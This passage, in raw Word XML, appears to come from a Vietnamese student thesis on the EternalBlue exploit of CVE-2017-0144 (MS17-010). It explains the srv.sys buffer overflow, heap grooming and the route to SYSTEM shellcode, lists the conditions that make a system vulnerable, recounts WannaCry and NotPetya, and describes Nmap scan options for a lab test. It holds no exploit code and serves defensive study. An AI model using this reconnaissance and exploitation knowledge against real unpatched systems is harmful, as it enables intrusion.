        <w:t xml:space="preserve">Do sai lệch trong việc kiểm tra kích thước danh sách FEA, driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cấp phát một vùng nhớ trong bộ nhớ nhân (Non-Paged Pool) có dung lượng nhỏ hơn khối dữ liệu thực tế mà client gửi tới. Khi driver thực hiện thao tác sao chép dữ liệu thuộc tính vào bộ nhớ đệm này, dữ liệu thừa đã bị ghi tràn ra ngoài phạm vi vùng nhớ được cấp phát (out-of-bounds write / buffer overflow), làm sai lệch các cấu trúc quản lý bộ nhớ kế cận trong kernel [3], [13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A24EC3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bước 3: EternalBlue kết hợp lỗi bộ nhớ với kỹ thuật bố trí vùng nhớ để thực thi mã.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B46F20" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mã khai thác EternalBlue gửi một chuỗi gói tin SMB được thiết kế theo trình tự nhằm sắp xếp bố cục các khối nhớ trong Non-Paged Pool (heap grooming). Khi lỗi tràn bộ nhớ xảy ra, dữ liệu ghi đè can thiệp vào các con trỏ điều khiển trong kernel, cho phép chuyển hướng luồng thực thi của bộ xử lý tới đoạn mã thực thi (Shellcode) do kẻ tấn công đưa vào bộ nhớ. Kết quả là đoạn mã được kích hoạt trực tiếp trong không gian nhân với đặc quyền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [11], [13].</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="423CC617" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2F17E1C3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>+-------------------------------------------------------------------------+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>| Bước 1: Gửi yêu cầu giao dịch SMBv1 kèm danh sách FEA                   |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|         (Sai lệch tính toán kích thước khi chuyển đổi FEA list)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Bước 2: Cấp phát bộ đệm kernel nhỏ hơn dữ liệu thực tế                  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|         ──&gt; Sao chép dữ liệu gây ghi ngoài vùng nhớ (Buffer Overflow)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Bước 3: Ghi đè cấu trúc điều khiển trong bộ nhớ kernel                  |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>|         ──&gt; Chuyển hướng luồng xử lý tới Shellcode (Thực thi mã SYSTEM) |</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:br/>
              <w:t>+-------------------------------------------------------------------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30882870" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="7284207C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Sơ đồ 1.3: Mô hình 3 bước phát sinh và khai thác lỗ hổng CVE-2017-0144.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF200B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.2.4. Điều kiện hệ thống có nguy cơ bị khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DD2E85" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Để một hệ thống Windows nằm trong phạm vi có thể bị khai thác CVE-2017-0144, cần xem xét các điều kiện kỹ thuật sau [5], [11], [13]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E8D10" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hệ điều hành:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Đang sử dụng phiên bản Windows thuộc danh mục bị ảnh hưởng (từ Windows XP đến Windows 10 các bản dựng đầu, hoặc Windows Server 2003 đến 2016) [5]. Trong phạm vi thực nghiệm, đề tài lựa chọn Windows 7 SP1 x64 làm máy mục tiêu do thuộc nhóm hệ điều hành bị ảnh hưởng và được module Metasploit hỗ trợ trong kịch bản kiểm thử của đề tài [13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F869C9F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tính năng SMBv1 đang được kích hoạt:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Driver xử lý </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đang hoạt động và tiếp nhận các yêu cầu giao dịch SMBv1 [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A333257" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cổng dịch vụ mạng có thể tiếp cận được:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cổng TCP 445 (hoặc TCP 139) ở trạng thái mở và không bị chặn bởi tường lửa mạng hoặc tường lửa cục bộ [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591EFE62" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Chưa cài đặt bản vá an ninh MS17-010:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hệ điều hành chưa được cập nhật gói vá bảo mật tương ứng theo danh mục ở Bảng 1.3 [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511DA15" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Đặc điểm xác thực:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE-2017-0144 có thể được khai thác từ xa mà không yêu cầu tài khoản xác thực hợp lệ khi dịch vụ SMBv1 mục tiêu có thể tiếp cận [5], [11]. Việc sử dụng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IPC$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trong đề tài chủ yếu xuất hiện ở cơ chế thăm dò của kịch bản Nmap và được phân tích chi tiết tại Mục 1.3.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E8215B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nguyên tắc đánh giá:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cần phân biệt giữa việc "hệ thống mở cổng 445" hoặc "hệ thống đang bật SMBv1" với việc "hệ thống có lỗ hổng MS17-010". Một máy tính đã cài đặt bản vá bảo mật vẫn mở cổng 445 để phục vụ chia sẻ tệp bình thường, nhưng driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> đã được bổ sung đoạn mã kiểm tra tính hợp lệ của tham số, do đó không còn bị ảnh hưởng bởi lỗi tràn bộ nhớ này [5], [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C549612" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.2.5. Đánh giá tác động an toàn thông tin theo tam giác CIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E0D9A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Các lỗ hổng thực thi mã từ xa trong bản tin MS17-010, đặc biệt là CVE-2017-0144 được lựa chọn làm mục tiêu thực nghiệm trong đề tài, có thể cho phép kẻ tấn công đạt khả năng thực thi mã với đặc quyền cao trong không gian nhân. Từ đó, tác động an toàn thông tin được xem xét theo ba trụ cột (tam giác CIA) như sau [3], [9], [11], [13]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2C9759" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tính bí mật (Confidentiality):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Khi bị khai thác thành công, kẻ tấn công có thể truy cập trái phép vào dữ liệu lưu trữ trên các phân vùng đĩa, cơ sở dữ liệu và bộ nhớ hệ thống. Các thông tin nhạy cảm như tệp tin cấu hình, tài liệu hoặc thông tin xác thực lưu trong bộ nhớ có thể bị thu thập mà không chịu sự kiểm soát của phân quyền tệp cục bộ [3], [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB71955" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tính toàn vẹn (Integrity):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Với quyền hạn chiếm được, kẻ tấn công có khả năng thay đổi tệp tin dữ liệu, can thiệp cấu hình hệ thống, sửa đổi chính sách bảo mật, tạo tài khoản người dùng mới hoặc cài đặt các dịch vụ ngầm nhằm duy trì quyền truy cập trên mục tiêu [9], [11].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A53B037" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tính sẵn sàng (Availability):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Khai thác lỗ hổng có thể dẫn tới việc máy chủ bị tắt, khởi động lại hoặc dữ liệu bị mã hóa/xóa bỏ. Ngoài ra, do can thiệp vào bộ nhớ kernel, nếu mã khai thác gặp lỗi không tương thích với cấu trúc bộ nhớ của bản dựng Windows cụ thể, hệ điều hành có thể gặp lỗi trang nghiêm trọng và rơi vào trạng thái màn hình xanh (BSOD), làm gián đoạn các dịch vụ đang cung cấp [3], [13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079BFBC3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.2.6. Khái quát các chiến dịch tấn công thực tế liên quan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061609C9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sự kết hợp giữa lỗ hổng MS17-010 và mã khai thác EternalBlue đã được ghi nhận trong các sự cố an ninh mạng diện rộng trên thế giới [12], [14], [15]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1682225D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mã độc tống tiền WannaCry (Tháng 05/2017):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WannaCry kết hợp mã khai thác EternalBlue với tính năng tự quét mạng. Khi lây nhiễm vào một máy tính, mã độc tự động quét cổng TCP 445 của các dải mạng lân cận, khai thác lỗ hổng </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MS17-010 trên các máy chưa vá để nhân bản và mã hóa tệp tin đòi tiền chuộc [14]. Vụ tấn công đã gây gián đoạn hoạt động của nhiều cơ quan y tế, ngân hàng và doanh nghiệp tại hơn 150 quốc gia [14], [15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D020F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mã độc NotPetya (Tháng 06/2017):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NotPetya sử dụng mã khai thác liên quan đến MS17-010 (bao gồm EternalBlue và EternalRomance) để lây lan qua mạng nội bộ. Mục tiêu chính của NotPetya là phá hoại cấu trúc hệ thống tệp và bản ghi khởi động (MBR), khiến hệ thống không thể khôi phục, gây thiệt hại cho nhiều tập đoàn vận tải và hạ tầng quốc tế [12].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F4BCBD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Các sự cố này cho thấy việc kiểm tra, xác minh và áp dụng các biện pháp phòng thủ cho dịch vụ SMB là nhiệm vụ kỹ thuật có ý nghĩa thực tiễn trong quản trị hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F9567C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.3. Công cụ phục vụ kiểm thử</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307792E3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.3.1. Hệ điều hành kiểm thử Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764ADF03" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux là bản phân phối Linux mã nguồn mở dựa trên Debian, được cấu hình sẵn các công cụ phục vụ kiểm tra an toàn mạng, đánh giá lỗ hổng và kiểm thử xâm nhập [16]. Trong đề tài, Kali Linux được lựa chọn làm máy trạm kiểm thử nhờ các yếu tố:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A5A0C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:t>Cung cấp môi trường mạng ổn định, hỗ trợ thao tác gói tin ở mức raw socket phục vụ trinh sát mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723D3DD2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:t>Tích hợp sẵn các bộ công cụ kiểm thử tiêu chuẩn như Nmap, Metasploit Framework, Wireshark và các thư viện hỗ trợ giao thức SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32799BB9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:t>Đảm bảo môi trường thực nghiệm độc lập với hệ thống Windows mục tiêu [16].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E57DA8D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.3.2. Công cụ quét mạng Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6844F8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap (Network Mapper) là công cụ quét mạng và kiểm tra dịch vụ tiêu chuẩn [17]. Trong quy trình kiểm thử SMB, Nmap đảm nhiệm các vai trò cụ thể:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A8761" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Phát hiện trạng thái cổng (`-sS`, `-p 139,445`):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sử dụng kỹ thuật quét TCP SYN (quét bán mở) để xác định xem cổng TCP 445 hoặc TCP 139 trên máy mục tiêu có đang mở (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t>) hay không mà không cần thiết lập phiên kết nối đầy đủ [17].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C98714D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nhận diện dịch vụ và phiên bản (`-sV`):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Thực hiện gửi các gói tin thăm dò (probes) tới cổng mở nhằm thu thập biểu ngữ phản hồi, từ đó định danh tên dịch vụ (ví dụ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>microsoft-ds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) và xác định thông tin phiên bản dịch vụ dựa trên cơ sở dữ liệu mẫu phản hồi của Nmap [17]. Cần lưu ý tùy chọn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-sV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tập trung nhận diện phiên bản của dịch vụ lắng nghe, trong khi việc nhận diện hệ điều hành thuộc về tùy chọn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hoặc các script chuyên biệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3F6160" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>1.3.3. Tự động hóa kiểm tra an toàn với Nmap Scripting Engine (NSE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8787E0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap Scripting Engine (NSE) cho phép thực thi các tập kịch bản viết bằng ngôn ngữ Lua để tự động hóa các tác vụ kiểm tra an toàn nâng cao [17], [18]. Đối với dịch vụ SMB và lỗ hổng MS17-010:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63747AB5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Script `smb-protocols.nse`:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gửi các yêu cầu Negotiate với danh sách dialect khác nhau để xác định máy chủ đích có đang chấp nhận giao tiếp qua giao thức SMBv1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
